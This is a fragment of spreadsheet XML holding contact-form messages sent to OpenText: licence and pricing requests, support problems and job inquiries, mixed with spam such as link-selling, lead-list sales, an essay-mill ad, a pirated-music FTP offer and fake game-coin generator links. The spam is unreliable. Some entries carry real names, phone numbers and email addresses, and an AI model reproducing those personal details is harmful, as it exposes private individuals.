Qty.3_x000D_
part number: S-SPMPI570101M_x000D_
OPEN TEXT SECURE SHELL</t>
  </si>
  <si>
    <t>Just wanted to make you aware of a RFP opportunity available at a small Arizona municipality.  If you are interested the RFP can be found at the following address: http://www.chinoaz.net/Bids.aspx?BidID=12_x000D_
_x000D_
Thanks.</t>
  </si>
  <si>
    <t>Dear Sirs, we are designing a website for a consultant company selling your solutions. Do you have a packet of solution/product graphics or similar that we can use in the design in relation to the solutions presentations etc._x000D_
_x000D_
Best regards, _x000D_
_x000D_
Marius Harridsleff</t>
  </si>
  <si>
    <t>I need a full copy of our contract with you.  I have the recent addendums, but need the actual full base contract.  Our lawyers are looking into all our contracts with suppliers, and without the base contract, they may find we have no valid contract with you._x000D_
_x000D_
Thank you,_x000D_
_x000D_
Michael Wodrich_x000D_
IS Manager_x000D_
Heartland Automotive, LLC</t>
  </si>
  <si>
    <t>Statistical Institute of Jamaica had previously purchased Teleform 10.9.1. _x000D_
However the original Server that host Teleform, hard drive has failed. When attempting to re-install Telefrom on a new server we encounter license code error that the machine code is incorrect._x000D_
As such we are seeking assistance in resolving this issue as we have active forms that were designed in the Designer module of the application. _x000D_
We bought TELEFORM from Xsomo international LTD. However we were advised that you are currently the owners of the Designer Module._x000D_
Looking forward to your assistance in advance.</t>
  </si>
  <si>
    <t xml:space="preserve">Ricoh should have a contract. </t>
  </si>
  <si>
    <t>We have a SaaS based Web application for managing Supply Chain of Organizations. We need a Business Intelligence Suite to be integrated in our application so that we can show data visualizations in the form of reports and dashboard on web to our SaaS customers . We want to know what offerings you have in this regard. We want to close this quickly . Hence request your quick response.</t>
  </si>
  <si>
    <t xml:space="preserve">I would like to talk to someone about implementing Open Text and getting a quote. We run SAP as our ERP.  </t>
  </si>
  <si>
    <t xml:space="preserve">We are looking to get in contact with business development person with your organization. We are currently in the discovery period in seeking solutions to managing our content management lifecycle ecosystem. To give some background, we are currently utilizing four different systems to manage Agency/Internal business collaboration, the Internal Review and Approval, Internal Sharing and Repository, and Content Management. We are open to solutions that combine the first three steps and communicate with our Content Management system or combine all four steps. </t>
  </si>
  <si>
    <t xml:space="preserve">To whom it may concern:_x000D_
I would like to learn more about your solution. Please get in touch with me._x000D_
Thanks and best wishes,_x000D_
Michaela_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Want to understand pricing on Fax2mail option. Just need to be able to send emails to a physical FAX device.  About 1,000 pages per month but volume fluctuates to a point where some months are at 50 pages and others at 5,000 pages. </t>
  </si>
  <si>
    <t xml:space="preserve">We are currently licensed for 24 RightFax channels and we are looking at doubling this number. The first step is obtaining a quote. Could somebody please reach out and help me get this process started? </t>
  </si>
  <si>
    <t>I contacted you last week and received a phone call after my initial contact. I was told I would get an email with several different times that we could do a phone call (initial meeting). However I haven't heard anything yet.</t>
  </si>
  <si>
    <t xml:space="preserve">We would like to know if Rightfax is compatible with the following printers:_x000D_
_x000D_
Sharp MX-M350N_x000D_
Sharp MX-M503N_x000D_
Sharp MX-M453N_x000D_
Sharp MX-M363N_x000D_
Sharp MX-M623N_x000D_
Sharp MX-M753N_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">The company Encase Enterprise license expired and the company is now in looking to renew.  Guidance product line have change since we last had coverage for Encase Enterprise.   Please review the below and inform me if any change is need to renew our license._x000D_
_x000D_
V7 EnCase® Enterprise Examiner Codemeter Time Security Key                              G2002075610_x000D_
V7 EnCase® Enterprise Examiner Codemeter Time Security Key                             G2002075608_x000D_
V7 EnCase® Enterprise Examiner Codemeter Time Security Key                              G2002075609_x000D_
V7 EnCase® Enterprise NAS Examiner/SAFE Codemeter Time Security Key          G2002061655_x000D_
V7 EnCase® Enterprise Examiner Codemeter Time Security Key                              G2002075610_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Sehr geehrte Damen und Herren,_x000D_
für unseren Account 271030, würden wir gerne einen neuen Nutzer einrichten. Welche Infos benötigen Sie hier von mir?_x000D_
Danke für eine Rückmeldung!_x000D_
Herzliche Grüße_x000D_
Marion Fischer_x000D_
</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
Do you have any free or freemium license por personal use?_x000D_
_x000D_
Kind regards.</t>
  </si>
  <si>
    <t>I need a quote for two licenses: OpenText NFS Server-Network File System Solution. Our NFS Maestro Server has been discontinued and we need a new product.</t>
  </si>
  <si>
    <t>Hi there-- on behalf of one of our media clients, looking to understand your commercial structure / pricing for the BPM product.  This is a first pass of due diligence, there could potentially be opportunity for follow-up conversation / RFP once requirements have been formalized._x000D_
_x000D_
At this stage, not yet interested in demo (to make the most of your time)._x000D_
_x000D_
Thanks, and look forward to hearing from you._x000D_
Luke</t>
  </si>
  <si>
    <t>Hi,_x000D_
We need licence file for LSCS product._x000D_
The support Team said we have to ask this file on this website._x000D_
How can I get this licence file ?_x000D_
Regards,_x000D_
Virginie Queguiner</t>
  </si>
  <si>
    <t>Upgrade Hummingbird DM server is 5.1.0.5 and Hummingbird Workflow is 5.2.0.952 to the newest version of eDOCS DM</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
If your clients/customers are accounting and law firms, then you may want to think about working with Financial Poise._x000D_
_x000D_
Financial Poise:_x000D_
Produces more than 100 webinars each year that are sold to more than 20,000 attorneys and accountants_x000D_
Is the largest content provider to West LegalEdcenter (a division of Thomson Reuters)_x000D_
Charges its attendees a list price of $175 per one hour webinar, so you know that our audiences value what we do_x000D_
Also sells its webinars to private company business owners and executives and high net worth investors_x000D_
_x000D_
Financial Poise offers its advertisers:_x000D_
Branding on the first slide of every webinar PowerPoint_x000D_
A devoted slide in each webinar PowerPoint on which our advertiser can present whatever message it desires_x000D_
Verbal thank you on the webinar_x000D_
Inclusion of its name in press releases and social media posts that promote the webinar_x000D_
Potential subject matter exclusivity that can block your competitors from also advertising_x000D_
Additional opportunities to advertise on our website and in our e-newsletters_x000D_
Ability to target to specific practice areas_x000D_
Prominence - Financial Poise will not permit more than three advertisers for any given webinar _x000D_
_x000D_
Please contact: advertising@financialpoise.com for more information or see our Media Kit here but ignore the pricing you see. We are offering substantial discounts if you act before February 28th._x000D_
_x000D_
Kind regards,_x000D_
_x000D_
Shannon Bilunas</t>
  </si>
  <si>
    <t xml:space="preserve">   Ultius gives all form of essay service for just a wide selection of subjects | Simply because Ultius usually takes satisfaction in owning the greatest premium of sample essay crafting to choose from._x000D_
 _x000D_
http://samarinda.bpk.go.id/?p=18414_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I am trying to find someone to talk to about buying licenses for Pixtools .net. We have a Software OEM Agreement with you (through EMC) but need to actually purchase licenses and report on sales. </t>
  </si>
  <si>
    <t>Hi_x000D_
_x000D_
I am managing a project to optimize the invoice flow in Point Resources._x000D_
_x000D_
Can you contact me for a review of your solutions?_x000D_
_x000D_
Thank you in advance for your help._x000D_
_x000D_
Regards;_x000D_
_x000D_
Jo Øglænd_x000D_
Point Resources AS</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
This is chadd from speedboost.xyz_x000D_
_x000D_
Haven't you seen how your website performs when your customer visits your website, and the time it takes to load?_x000D_
_x000D_
You can refer it here, _x000D_
https://developers.google.com/speed/pagespeed/insights/?url=http://opentext.com _x000D_
_x000D_
Currently your website scores 73 which is pretty above average._x000D_
Refer here, https://www.speedboost.xyz/fix/http://opentext.com_x000D_
_x000D_
It is now the generation of Website owners to know all about the optimizations themselves._x000D_
_x000D_
Analyze your website yourself here, https://www.speedboost.xyz/_x000D_
_x000D_
Get the detailed performance report and fix it within 15 mins._x000D_
_x000D_
Please let me know if you need a quick demo or any questions I can help you with._x000D_
_x000D_
Chadd,_x000D_
Web Performance Specialist,_x000D_
SpeedBoost.xyz_x000D_
Skype: askan.chandru_x000D_
Contact: (+16469718889)_x000D_
https://www.linkedin.com/in/chadd-chandru-rajendran/_x000D_
P.S. We are not spammers. This is a one time analysis and we won't bother you any more. We suggest that you make use of this opportunity wisely.</t>
  </si>
  <si>
    <t>We are looking to procure an ECM and BPM. Would request the respective account manager for Middle East region to get in touch with me on above coordinates.</t>
  </si>
  <si>
    <t>Can you tell me if you provide product training courses or material for Brava for WebTop?</t>
  </si>
  <si>
    <t>Hi,_x000D_
I'm wondering if you could help. My support access seems to have been revoked. _x000D_
The company I work for was named GM Financial, but it has since been renamed Vauxhall Finance - I'm wondering if this has anything to do with me losing my support?_x000D_
Many thanks_x000D_
Brian</t>
  </si>
  <si>
    <t>Hej, _x000D_
Vi har Open Text idag men en äldre version och iom att vi vill uppdatera andra program (Office, Windos osv) tittar vi även på nytt dokumenthanteringssystem. Jag är intresserad av en visning av Open text senaste version och sen även offert för uppgradering(?)/nyinstallation mm. Med vänlig hälsning Mia</t>
  </si>
  <si>
    <t xml:space="preserve">Bonjour _x000D_
nous souhaitions une démonstration de votre solution ECM/GED_x000D_
ainsi qu'une estimation de coût._x000D_
nous somme le comité régional de tourisme de la Réunion, association loi 1901 a but non lucratif. nous comptons environ 100 personnes. il peut s'agir d'un modèle TPE pour vous. _x000D_
merci pour votre retour. _x000D_
cdt _x000D_
 </t>
  </si>
  <si>
    <t>I was just checking out your site, and was very impressed._x000D_
You guys really do some great work._x000D_
Have you considered adding animated videos or 3D videos to your portofolio?_x000D_
My team, located in Israel, helps businesses like yours by creating 60-90 second videos to explain their business at affordable rates with quality that cannot be beaten.._x000D_
Want to hear more?_x000D_
You can check out our work at explainmybusiness.com._x000D_
We are eager to hear back from you!_x000D_
Greetings from Jerusalem,_x000D_
Lisa Kent</t>
  </si>
  <si>
    <t xml:space="preserve">we are evaluating various vendors for Open text for our client. we are looking for open text services i.e implementation, migration and upgrade. _x000D_
</t>
  </si>
  <si>
    <t>My login to the support site is no longer working - can you contact me to re-instate</t>
  </si>
  <si>
    <t>Hi OpenText,_x000D_
I would like to know if you have training sessions or tutorials to help us understand how Teamsite CMS works. We are a digitla agency and we have a client using Teamsite, we need training and support._x000D_
_x000D_
Can you please help?_x000D_
Thank you_x000D_
_x000D_
Best Regards,_x000D_
Célia Saraiva</t>
  </si>
  <si>
    <t>http://0daymusic.org/premium.php _x000D_
 _x000D_
Private FTP Music/Albums/mp3 1990-2018: _x000D_
Plan A: 20 EUR - 200GB - 30 Days _x000D_
Plan B: 45 EUR - 600GB - 90 Days _x000D_
Plan C: 80 EUR - 1500GB - 180 Days</t>
  </si>
  <si>
    <t>benötigen Informationen zu OpenText Brava! DWG Viewer - Lizenzierung bzw. Brava! Desktop DXP  auf Citrix Terminal Server</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
Hi, Are you looking for Amazon Redshift  Leads for your Marketing Campaign? Get 5,078  Amazon Redshift  Customer Record (2018 New Tele-interviewed file) from UK. _x000D_
_x000D_
Get a test file to evaluate the Quality of customer Record. _x000D_
_x000D_
kindly respond back for test file and additional information._x000D_
	_x000D_
Note: Database also available countries like Australia, USA and Europe._x000D_
	_x000D_
Regards,_x000D_
	_x000D_
Cathy Henry_x000D_
cathy.henry@mybeta4.com_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>We are a news publisher based in Hong Kong. We are looking for a semantic engine for tagging and taxonomy suggestions.</t>
  </si>
  <si>
    <t>I have been contact ur local jingling and Shanghai office to ask for a solution with email content management. Please give me a contact window to discuss more</t>
  </si>
  <si>
    <t>For Employment services</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I propose to substantially raise your product sales sponsored thanks to LinkJuice.io, the reference platform when it comes to putting promoters in contact with influential websites like yours._x000D_
_x000D_
In order to increase your sponsored product sales, it’s a straightforward process:_x000D_
1/ Register here: https://partner-linkjuice.io/register_x000D_
2/ Add your websites to your account while detailing your terms (rates, collaborative conditions…)_x000D_
3/ That’s all! Then, as soon as a promoter is interested, we’ll notify you by e-mail_x000D_
_x000D_
We currently have 500 registered promoters (marketing agencies, national and international brands) of all types who are waiting for media such as yours to initiate new collaborations! _x000D_
_x000D_
Here are some benefits of registration on LinkJuice.io:_x000D_
- You can decide whether to manage all proposals OR assign them all to us (negotiation, quality writing that complies with your terms, publication) in which case you would simply collect your profits - it’s up to you._x000D_
- We pay you really well_x000D_
- We pay quickly by wire transfer or PayPal_x000D_
_x000D_
Find out more here: https://partner-linkjuice.io/publishers_x000D_
_x000D_
Should you need any extra information, feel free to visit our website or contact us on our contact page: https://partner-linkjuice.io/contact_x000D_
_x000D_
Yours,_x000D_
_x000D_
Marc._x000D_
_x000D_
PS: We did some Googling to find your website.</t>
  </si>
  <si>
    <t xml:space="preserve">Need some help understanding everything. People have been taking advantage of me. I've been teaching myself how to secure my internet connection and use my services. Its not easy. </t>
  </si>
  <si>
    <t xml:space="preserve">Looking for solution to automate vendor invoice management into SAP </t>
  </si>
  <si>
    <t xml:space="preserve">I want to explore training partnership / franchisee or curriculum design and development collaboration. We are Sydney based . </t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
[url=http://13.get8.tk]Лечение шпоры[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">i need to download my teamdevloper virsion 6.3  </t>
  </si>
  <si>
    <t>I think my phone is being remotely hosted by some asshole who has been criminally harassing me for 5 years. I want to know if this is so. My number is 5042109853</t>
  </si>
  <si>
    <t xml:space="preserve">renewal licenses  for documentum in KSA </t>
  </si>
  <si>
    <t xml:space="preserve">we need quote for Right Fax solution in saudia arabia, please advise for PS/license partner for this product. </t>
  </si>
  <si>
    <t>Новости хай тек здесь [url=http://1st-digital.ru/]1st-digital.ru[/url]</t>
  </si>
  <si>
    <t>Dear Team,_x000D_
_x000D_
we're having issues with RF server smtp_x000D_
SUID : 33387-12153_x000D_
Issues : SMTP Fax to mail is not working with client._x000D_
Client is not able to receive Fax on email, We checked the setting under Right-fax server it proper._x000D_
We tested sending fax to user and we can see its received under Faxutil but not email and there is nor email sign next to Fax._x000D_
_x000D_
error : SSF:Returned error code 536875520 (0x20001200) - '550 relay access denied - please authenticate_x000D_
_x000D_
Kindly let us know what will be the issues and suggest</t>
  </si>
  <si>
    <t>предложения по благоустройству города краснодара_x000D_
благоустройство территорий краснодар_x000D_
правила благоустройства мог краснодар_x000D_
план благоустройство краснодара_x000D_
благоустройство двора в краснодаре_x000D_
 _x000D_
---------------------- _x000D_
http://благоустройство-краснодар.рф/</t>
  </si>
  <si>
    <t>Hello, I was an employee of opentext till last year and i did not receive W2. Can you please give HR contact to reach out to them for my W2? Thanks</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
Are you looking to get more traffic for opentext.com.au ?_x000D_
I'm running a SEO and SPY group buy service which can help._x000D_
You can save 95+% from your accounts cost with my service._x000D_
Contact me at skype: neca_bg_x000D_
_x000D_
Here is a full list of accounts:_x000D_
_x000D_
    Adfox.io_x000D_
    Adsviser 2.0_x000D_
    Ahrefs Advanced_x000D_
    Advault.io_x000D_
    AffiliateFix_x000D_
    Affkit_x000D_
    Alexa_x000D_
    Animatron_x000D_
    Animoto_x000D_
    Article Builder_x000D_
    Article Forge_x000D_
    Anstrex Ultimate_x000D_
    AudioBlocks_x000D_
    Authority Labs_x000D_
    Beacon_x000D_
    Big Content Search_x000D_
    Buzzsumo_x000D_
    Canva_x000D_
    CBEngine_x000D_
    Cognitive SEO_x000D_
    DeepCrawl_x000D_
    DomCop_x000D_
    Ecomhunt_x000D_
    eCom Inspector_x000D_
    Epictions_x000D_
    Grammarly_x000D_
    GraphicStock_x000D_
    HBO Now_x000D_
    Indexification_x000D_
    Instant Link Indexer_x000D_
    Intelligynce.com_x000D_
    iSpionage_x000D_
    Jungle Scout_x000D_
    KeywordKeg_x000D_
    Keywordrevealer_x000D_
    Keywordtool.io_x000D_
    KWFinder_x000D_
    Long Tail Pro_x000D_
    Lynda_x000D_
    Mad Society_x000D_
    Majestic Pro_x000D_
    MOZ_x000D_
    Native Ad Buzz_x000D_
    Pexda_x000D_
    PicMonkey_x000D_
    Piktochart_x000D_
    SEO Profiler_x000D_
    Semrush Guru_x000D_
    Serpstat_x000D_
    SER Verified Lists_x000D_
    Spin Rewriter_x000D_
    SpyFu_x000D_
    Storybase_x000D_
    SpyFy.io_x000D_
    Stack That Money_x000D_
    Stencil_x000D_
    StockUnlimited_x000D_
    TeeSpy_x000D_
    Terapeak_x000D_
    The Best Spinner_x000D_
    Tidal_x000D_
    Traffic Research_x000D_
    VideoBlocks_x000D_
    Visme_x000D_
    WebTextTool_x000D_
    Word Ai_x000D_
    Woorank_x000D_
_x000D_
_x000D_
Do not reply to this email, it is not monitored._x000D_
Contact me at skype: neca_bg</t>
  </si>
  <si>
    <t>I sent in a contact form earlier.  I have just been logged in to the computer in Chicago using DM10.  She can create a document in DM and save and open it with no problem.  However, once she creates a new version and makes edits the problems start.  If she tries to save again it forces her to create yet a new version.  Once she closes and reopens, the new version is blank.  She can save the new version as a new document and the changes will hold.  We switched her to DM 10 because she was having problems with the DM footer and were told that would take care of her issues.  But the footer is not nearly as big an issue as not saving her changes.  Thank you for your prompt response.</t>
  </si>
  <si>
    <t>trying to buy parts for Magellan RoadMate</t>
  </si>
  <si>
    <t>We have a user that has just updated to DM 10 and is having issues with versions.  When she saves as a new version, closes and comes back later her new version is blank.</t>
  </si>
  <si>
    <t>I Joseph Manzo should be the only contact for Brain-Pad, Inc. Please take out any other contacts like Jeanne and Bill since I can't see how to do let. Please let me know this has been taken care of. Thank you</t>
  </si>
  <si>
    <t>Последние женские новости здесь [url=http://delodom.com/]delodom.com[/url]</t>
  </si>
  <si>
    <t>job oppertunity</t>
  </si>
  <si>
    <t>Всем привет!  Класный у вас сайт _x000D_
Нашел прикольные сервера ксс на этом сайте: http://cs-servers-monitoring.ru/ : _x000D_
[url=http://cs-servers-monitoring.ru/game/cs] сервера кс 1 6 зомби с бесплатным админом [/url] _x000D_
[url=http://cs-servers-monitoring.ru/game/csgo] сервера кс го идл [/url] _x000D_
[b] скачать плагины для сервера css v34 [/b] http://cs-servers-monitoring.ru/game/source _x000D_
[b] сервера minecraft 0 16 1 [/b] http://cs-servers-monitoring.ru/game/minecraft _x000D_
И тут нашёл много интересных новостей про игры и сервера: _x000D_
http://cs-servers-monitoring.ru/news/2426-god-of-war-4-otpravit-igrokov-v-valgallu.html</t>
  </si>
  <si>
    <t>Need to put more process into my business. Heard about process Suite from a business acquaintance</t>
  </si>
  <si>
    <t>http://tamasha.com/</t>
  </si>
  <si>
    <t>Oh my goodness! an incredible article dude. Thanks Nonetheless I am experiencing issue with ur rss . Don’t know why Unable to subscribe to it. Is there anyone getting equivalent rss drawback? Anyone who is aware of kindly respond. Thnkx      http://hellowh983mm.com</t>
  </si>
  <si>
    <t>I discovered your blog web site on google and check a couple of of your early posts. Continue to maintain up the superb operate. I simply further up your RSS feed to my MSN Information Reader. Searching for ahead to reading more from you in a while!…      http://hellowh983mm.com</t>
  </si>
  <si>
    <t>Ресторан в Барселоне, Испания. [url=https://xn--80aieocueqr8g.xn--p1ai]продажа двухкомнатных квартир мытищи[/url] финская отделка: эстетика функциональности. [url=https://xn--80aieocueqr8g.xn--p1ai]жк отрадный проезд[/url]</t>
  </si>
  <si>
    <t>Need information on becoming a reseller and a quote on the products listed below once approved as a reseller._x000D_
_x000D_
RightFax Open Text Enterprise: 6x12 maintenance &amp; support w/28 FoIP_x000D_
Enabled Channels: Exch, XML: PDF, Encryption Mod: Shared Serv Mod._x000D_
SUID: 26291-12198_x000D_
RightFax Open Text Enterprise Server.: 6x12 maintenance &amp; support w/28_x000D_
FoIP Enabled Channels: Exch, XML: PDF, Encryption Mod: Shared Serv Mod._x000D_
SUID: 74894-12234</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;h4&gt;Оборудование заловЛФК &lt;/h4&gt;.&lt;br&gt; Куптиь шведскую   Детские шведские стенкидлядомавСанкт-Петербурге. Чтобы привить сыну или дочке привычку к упражнениям, приглашаем купить усиленные шведские стенкидлядетейвквартирувЦенаизменяется с учётом материала, комплектности, прооизводителя.  /dlya-detey/ &lt;br&gt;  _x000D_
 [URL=http://sport-shved-turnik.tk/shvedskaya-stenka-chertezhi-razmery/]Шведская стенка чертежи размеры[/URL] [URL=http://sport-video.ga/kupit-turnik-dlya-doma-nastennyj-v-spb-foto/]Купить турник для дома настенный в спб фото[/URL]  _x000D_
 &lt;h4&gt;шведскаястенка- Доска объявлений от частных лиц и  &lt;/h4&gt;.&lt;br&gt; &lt;strong&gt;КупитьшведскуюстенкувНижневартовске.  &lt;/strong&gt;.&lt;br&gt;  _x000D_
бассейн малыш в воронеже детский центр солнышко цена _x000D_
 _x000D_
 ШведскаястенкаРекордА2. 6,980  ... Усиленная    стенка Рекорд Б3 . ... В его онсове лжеитшведскаястенка ,  -  наШведскаястенкаРекордБ4, огромный выбор, СПЕШИТЕ! Досттавка по Москве и всей  -  турникомРекорд– объявление о продаже в Санкт-Петербурге. Цена: 7 490 руб  ... -  « Рекорд » с креплением «пол-потолко» может устанавливаться в помещении высотой 2,45 – 2,85 м, при высоте помещения меньше 2,45м и более 2,85м используется крепление к  &lt;h2&gt;Шведская стенка с турниками - купить в Санкт-Петербурге по  комплекс СТРекордпредназжначен для выполнения общефизических и специальных упражнений в условиях спортивного зала, дома,  стенки и турники для дома Рекорд оптом в России  стенкус турником и брусьями в интернет магазине " Рекорд ". Все, что нужно для эяфективного развития вашего тлеа в домашних  стенка с утрником и брусьями Рекорд В3 - Купить турник  из 4944 товара в категориишведская стенкас турниками в наличии! ??? Доставка: Санкт-Петербург, Скидки! Goodster знает, где народшведская стенкас турниками в Санкт-Петербурге ешевле покупает :).&lt;br&gt; &lt;h2&gt;КупитьШвдескую стенку усиленную к стене &lt;/h2&gt;.&lt;br&gt;  _x000D_
  [URL=http://shved-stenki.ru/shvedskaya-stenka-dlya-detej-svoimi-rukami-chertezhi-foto/]Шведская стенка для детей своими руками чертежи фото[/URL] [URL=h</t>
  </si>
  <si>
    <t>We are looking to implement a new knowledge base, I'm wondering if we could get a demo or more information.</t>
  </si>
  <si>
    <t>Trying to request a trial of "NFS Solo" but the request form is not responsive.  Can you please advise how we may try this software to see if it meets our needs?  Thank you._x000D_
-Keith</t>
  </si>
  <si>
    <t xml:space="preserve">Notions Marketing needs to update their AS2 certificate with you.  I have the cert packet and need to know who to coordinate this with.  I can supply recent traffic or interchange info to show proof of account access and confirm the correct account is being impacted.  </t>
  </si>
  <si>
    <t>Need Assistance with RightFax Express.  Not sending faxes to a specific number and other transmission/receiving issues.</t>
  </si>
  <si>
    <t>We are implementing opentext and have created a folder structure, we note the folder structure sorts on subject line however we wish the sort to be on date/time then subject. Is the default sort by subject line and can we change default to be on date/time then subject line.</t>
  </si>
  <si>
    <t>Looking for RightFax Software, want to replace an old faxing solution, just bought a Dialogic Brooktrout TR1034 to go into my Windows Server which will host the RightFax Software. I have tried to email and call put all seems to lead to a dead end. _x000D_
Please assist_x000D_
Thomas</t>
  </si>
  <si>
    <t>I am interested in learning more about Fax2Mail in a healthcare setting. A TRHC company already uses your offering and I want to see how well it could fit with a different tech stack.</t>
  </si>
  <si>
    <t>(Email response is fine)_x000D_
_x000D_
Hi._x000D_
_x000D_
I was wondering how an individual contractor can get hold of a demonstration licensed version of Captiva Software? I cannot seem to find the software available to download on the website, and keen to progress forward. _x000D_
_x000D_
Any help and advice would be most welcome._x000D_
_x000D_
Regards.</t>
  </si>
  <si>
    <t>We run Infor Visual Manufacturing at our facility, looking for pricing information on Gupta Report Builder.</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Supplier Representative, _x000D_
_x000D_
CN intents to plan, implement, support and evolve the notification management capabilities that will be used by CN users and external stakeholders (customers, partners, agencies, etc.). As part of major business transformation initiative (En.a.ble Program), CN is interested in notification management solutions that allow businesses such as CN to align with industry best practices,  improve collaboration, automate processes, enhance productivity/efficiency, and improve overall user experience. CN has decided to put out a Request for Proposal document (RFP) to certain number of vendors and as such your company has been selected as one of the potential vendor. Please  provide an email address so we can send you our RFP. _x000D_
_x000D_
Deadline Date/ Time	Activity _x000D_
February 13, 2018 5pmEST	Acknowledgement of Receipt of this RFP_x000D_
February 19, 2018 9am EST	Submission of questions/inquiries_x000D_
March 5, 2018 9am EST	Submission of Proposal_x000D_
Week of March 5, 2018	RFP review and evaluation by CN_x000D_
March 9, 2018	Announcement of finalists by CN_x000D_
March 12, 2018	Start of Oral Presentation with finalists _x000D_
March 23, 2018	Final decision and communication_x000D_
_x000D_
Should you have any question with the above, please do not hesitate to contact me. _x000D_
_x000D_
Best,_x000D_
</t>
  </si>
  <si>
    <t>I need my access to mimic IEAS FARSAKH access. I used to have access but and getting not allowed message.</t>
  </si>
  <si>
    <t>My account seems to be locked out or doesn't work correctly? Please help.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
 _x000D_
I would like to know if you are interested in acquiring Tibco Leads_x000D_
_x000D_
We also provide other types of technology database like: Spotfire, Oracle, Jaspersoft, Informatica, MuleSoft, Salesforce, Tableau, Qlik, SAP, Teradata, IBM, MicroStrategy, Infosys, Citrix, Gartner, VMware and many more..._x000D_
 _x000D_
Information fields: Names, Title, Email, Phone, Company Name, Company URL, Company physical address, SIC Code, Industry, Company Size (Revenue and Employee)._x000D_
 _x000D_
If interested, let me know your targeted geography, so that we can get back to you with the counts and more information._x000D_
 _x000D_
Regards,_x000D_
Melissa Wilson_x000D_
Marketing Executive_x000D_
 _x000D_
If you are not interested in receiving further emails, please answer back with "Exclude" in the title._x000D_
</t>
  </si>
  <si>
    <t>I am using HostExplorer v15 and was wondering if you could tell me if there is a way to modify the default location for the HostExplorer user profile files (the *.HEP files)?  I want to be able to point them to each of our customer's OneDrive folders under their Windows 10 User Profile account on the local hard drive based on their login user name.  Is there a utility, or Registry Key and System Variable modification that can accomplish this?  I've searched high and low on the internet and haven't found any documentation regarding this issue.</t>
  </si>
  <si>
    <t>Could you please send pricing and availability for the following?_x000D_
_x000D_
OTRF-CHUP-FE_x000D_
RIGHTFAX IP-ENABLED ADDITIONAL FAX_x000D_
2 EA_x000D_
_x000D_
_x000D_
OTRF-ISUP_x000D_
OPENTEXT INCREMENTAL ASP STD SUPP._x000D_
1 EA_x000D_
_x000D_
_x000D_
PS-RL003_x000D_
REMOTE INSTALLATION AND CONFIG SVC_x000D_
1 EA_x000D_
_x000D_
Please email quote back to anita.chow@area51esg.com_x000D_
_x000D_
Thanks</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
Would you be interested in obtaining email database of Learning Management System Software Users?_x000D_
_x000D_
This list Contains Company name, Web address, Contact name, Phone number, Email address, Title, physical address, City, State, Zip Code, Country, Phone number, Fax Number, Employee size._x000D_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</si>
  <si>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We are currently using the Free Brava viewer to view autocad dwg files.  We would like to purchase ONLY the Autocad only (DXP) 10 seat network license.  I need  to know if the license is concurrent.  Thank you.</t>
  </si>
  <si>
    <t>Inquiring regarding document management systems.</t>
  </si>
  <si>
    <t>When I try to access to Knowledge.openText.com it redirects me to the log in after that It said I don't have enough permissions, I supposed to have access to this directory</t>
  </si>
  <si>
    <t>I paid a payment for our Partner Contract Renewal. RC204550, for $1,250.  Its says CAD?  It should be US.  Thanks!</t>
  </si>
  <si>
    <t>I'm working on the BP Bruce Transition Project and would like to discuss the potential use of Documentum for Serica Energy. Please contact me as soon as possible.</t>
  </si>
  <si>
    <t>Застройщики Петербурга: Девяткино и Парнас. [url=https://xn--80aieocueqr8g.xn--p1ai]купить новостройку в мытищах от застройщика[/url] кто кого: кварт иры на сутки в минске или гостиницы минска? [url=https://xn--80aieocueqr8g.xn--p1ai]жк отрадное в мытищах 11 корпус[/url]</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
_x000D_
Nous recherchons un intégrateur Documentum pouvant intervenir à Bruxelles en français et/ou en anglais. Pourriez-vous nous communiquer la liste de partenaires potentiels ?_x000D_
_x000D_
Cordialement,_x000D_
_x000D_
Timothée Pourbaix</t>
  </si>
  <si>
    <t>Unable to raise the request to register for getting full access to OpenText knowledge portal</t>
  </si>
  <si>
    <t xml:space="preserve">Many thanks for a really amazing blog. It was very helpful. I am just so glad I found this. _x000D_
http://stevenrgerst.com/c37-ix/29/articles-nydpoWE-44/page/2/function.include_x000D_
http://stevenrgerst.com/s56-vf/76/articles-nydpoYW-2717/page/2/function.session-start/page/function.include_x000D_
</t>
  </si>
  <si>
    <t>&lt;a href=http://freefifacoins.hatenablog.com&gt;Free FIFA 18 Coins&lt;/a&gt; fifa 18 coin generator fake &lt;a href=http://freefifacoins.hatenablog.com/entry/2017/12/28/043732&gt;How To Get Free FIFA 18 Coins&lt;/a&gt; fifa 18 hacks xbox one _x000D_
[url=http://freefifacoins.hatenablog.com]How To Get Free FIFA 18 Coins[/url] _x000D_
[url=http://freefifacoins.hatenablog.com/entry/2017/12/28/043732]How To Get Free FIFA 18 Coins[/url]</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren, _x000D_
ich möchte mich auf die Stellenausschreibung Team Lead, IT Service Desk ( Ref#: 16745) bewerben, musste aber leider feststellen, dass diese (am Montag 05.02.2018 noch online) nicht mehr aufgeführt ist. Da mich diese Stelle sehr anspricht, ist meine Frage, ob und wenn ja wie ich Ihnen meine Bewerbungsunterlagen zukommen lassen kann._x000D_
 _x000D_
Vielen Dank._x000D_
Mit freundlichen Grüssen_x000D_
Michael Greifzu_x000D_
_x000D_
e-Mail: michael.greifzu@gmx.de_x000D_
Tel.: +49 173 2184316</t>
  </si>
  <si>
    <t xml:space="preserve">Whoa! This can be by far the most helpful thing on the subject I've ever come across. Many thanks for your hard work. _x000D_
http://eggnogpolo21.myblog.de/eggnogpolo21/art/11101639/-Value-of-over-the-internet-writing-services-to-help-the-students-_x000D_
</t>
  </si>
  <si>
    <t>Dear Sir/Madam,_x000D_
